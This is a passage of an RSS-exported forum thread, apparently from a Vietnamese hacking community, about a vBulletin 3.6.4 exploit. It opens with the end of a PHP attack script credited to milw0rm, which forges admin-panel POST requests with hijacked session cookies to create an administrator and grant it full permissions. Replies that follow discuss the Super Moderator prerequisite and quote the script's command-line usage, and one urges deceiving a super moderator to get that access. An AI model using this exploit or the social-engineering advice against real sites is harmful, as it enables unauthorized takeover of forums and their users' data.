$data.="&user%5Blastactivity%5D%5Bhour%5D=14";
$data.="&user%5Blastactivity%5D%5Bminute%5D=58";
$data.="&user%5Blastpost%5D%5Bmonth%5D=0";
$data.="&user%5Blastpost%5D%5Bday%5D=";
$data.="&user%5Blastpost%5D%5Byear%5D=";
$data.="&user%5Blastpost%5D%5Bhour%5D=";
$data.="&user%5Blastpost%5D%5Bminute%5D=";
$data.="&userid=".$mu_uid;
$data.="&ousergroupid=";
$data.="&odisplaygroupid=0";
$data.="&userfield%5Bfield1_set%5D=1";
$data.="&userfield%5Bfield2_set%5D=1";
$data.="&userfield%5Bfield3_set%5D=1";
$data.="&userfield%5Bfield4_set%5D=1";
$packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5&#40;trim&#40;$my_hash&#41;&#41;."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim&#40;$sess_hash&#41;."; ".$cookie_prefix."cpsession=".trim&#40;$cpsess_hash&#41;.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii&#40;$packet&#41;;
sleep&#40;1&#41;;

//now give full rights to the new Administrator
$data ="do=update";
$data.="&adminhash=".$adminhash;
$data.="&adminpermissions%5Bcanadminsettings%5D=1";
$data.="&adminpermissions%5Bcanadminstyles%5D=1";
$data.="&adminpermissions%5Bcanadminlanguages%5D=1";
$data.="&adminpermissions%5Bcanadminforums%5D=1";
$data.="&adminpermissions%5Bcanadminthreads%5D=1";
$data.="&adminpermissions%5Bcanadmincalendars%5D=1";
$data.="&adminpermissions%5Bcanadminusers%5D=1";
$data.="&adminpermissions%5Bcanadminpermissions%5D=1";
$data.="&adminpermissions%5Bcanadminfaq%5D=1";
$data.="&adminpermissions%5Bcanadminimages%5D=1";
$data.="&adminpermissions%5Bcanadminbbcodes%5D=1";
$data.="&adminpermissions%5Bcanadmincron%5D=1";
$data.="&adminpermissions%5Bcanadminmaintain%5D=1";
$data.="&adminpermissions%5Bcanadminplugins%5D=1";
$data.="&cssprefs=";
$data.="&dismissednews=";
$data.="&userid=".$my_uid;
$data.="&oldpermissions=98300";
$data.="&adminpermissions%5Bcanadminupgrade%5D=0";
$packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5&#40;trim&#40;$my_hash&#41;&#41;."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim&#40;$sess_hash&#41;."; ".$cookie_prefix."cpsession=".trim&#40;$cpsess_hash&#41;.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii&#40;$packet&#41;;
echo "\nnow go to<span class="link"> http://</span>".$host.$path."admincp/index.php and login to the control panel...";
?&gt;

# milw0rm.com &#91;2007-02-28&#93;</pre>
		</div>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44082</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44082</link>
				<pubDate><![CDATA[Fri, 2 Mar 2007 01:07:43]]> GMT</pubDate>
				<author><![CDATA[ anh_that_tinh]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ Cập nhật Latest Version: 3.6.5 hoặc 3.5.8 liền . ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44088</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44088</link>
				<pubDate><![CDATA[Fri, 2 Mar 2007 01:21:09]]> GMT</pubDate>
				<author><![CDATA[ subnetwork]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ "you need a Super Moderator account" cái nì đòi phải có  quyền hơi cao .]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44122</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44122</link>
				<pubDate><![CDATA[Fri, 2 Mar 2007 03:03:18]]> GMT</pubDate>
				<author><![CDATA[ canh_nguyen]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ Qua cái lỗi này em rút ra được kinh nghiệm, không nên dùng intval() khi so sánh. Cứ ép kiểu vậy mà khỏe hơn :D]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44129</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44129</link>
				<pubDate><![CDATA[Fri, 2 Mar 2007 03:56:13]]> GMT</pubDate>
				<author><![CDATA[ 114v]]></author>
			</item>
			<item>
				<title>Re: vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ bug này khái thác cũng hơi khó ( đây chỉ là nhận định khi đọc đoạn đầu )]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44327</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44327</link>
				<pubDate><![CDATA[Sat, 3 Mar 2007 11:56:31]]> GMT</pubDate>
				<author><![CDATA[ zatuzik]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ - Đòi hỏi phải có account Smod nghĩ hơi khó.

- Vả lại,nếu đã được người ta tin tưởng.Set cho lên Smod để phụ giúp việc quản lý 4rum thì có lẽ không nên "phụ lòng" người ta.

- Hình như 3.6.3 cũng dính cái này.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44425</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44425</link>
				<pubDate><![CDATA[Sat, 3 Mar 2007 20:21:17]]> GMT</pubDate>
				<author><![CDATA[ delua]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ Vậy thì lừa thằng Smod ,thằng này chắc dễ lừa hơn thằng admin,tỉ lệ thành công lại cao hơn]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44592</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#44592</link>
				<pubDate><![CDATA[Sun, 4 Mar 2007 19:28:47]]> GMT</pubDate>
				<author><![CDATA[ mechk]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ <blockquote>php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
 php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81&nbsp;
		</blockquote>
các bro ơi. CHo em hỏi cái command này chạy như thế nào. Dùng để chạy trong linux hả? plz, eplain it for me ^_^]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#45716</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#45716</link>
				<pubDate><![CDATA[Fri, 9 Mar 2007 22:32:23]]> GMT</pubDate>
				<author><![CDATA[ minhquan1712]]></author>
			</item>
			<item>
				<title>Re: vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ các bác post lên chẳng nói về cách khai thác lỗi này. Bọn em là newbie thì sao hiểu được chứ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47689</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47689</link>
				<pubDate><![CDATA[Sun, 18 Mar 2007 17:40:18]]> GMT</pubDate>
				<author><![CDATA[ moon_knightvt]]></author>
			</item>
			<item>
				<title>Re: vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">moon_knightvt wrote:</cite><br>
		<blockquote>các bác post lên chẳng nói về cách khai thác lỗi này. Bọn em là newbie thì sao hiểu được chứ&nbsp;
		</blockquote>
Rất rõ ràng rồi còn gì bạn, dùng php mà exploit thôi. Còn muốn hiểu thì phải học lập trình chứ, đâu chỉ nói một hai câu là hiểu được.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47870</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47870</link>
				<pubDate><![CDATA[Mon, 19 Mar 2007 16:56:39]]> GMT</pubDate>
				<author><![CDATA[ HVAnewbie]]></author>
			</item>
			<item>
				<title>Re: vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ bạn nói đúng lắm có lẽ tôi không nên đặt ra những câu hỏi như thế này nữa. 
Tự túc là hạnh phúc đúng không]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47926</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#47926</link>
				<pubDate><![CDATA[Mon, 19 Mar 2007 20:47:25]]> GMT</pubDate>
				<author><![CDATA[ moon_knightvt]]></author>
			</item>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ Hic ! được tin tưởng lám mới được giao cái quyền Smod ai lại phá bẩn nhau bao giờ , mà cái bug này thì mem ko thể chơi được ............ pohand
********************************************************
Đi một ngày đàn học một sàn ...................... bug mới]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/7565.hva#54709</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/7565.hva#54709</link>
				<pubDate><![CDATA[Thu, 19 Apr 2007 18:55:47]]> GMT</pubDate>
				<author><![CDATA[ hackernpmk]]></author>
			</item>
	</channel>
</rss>
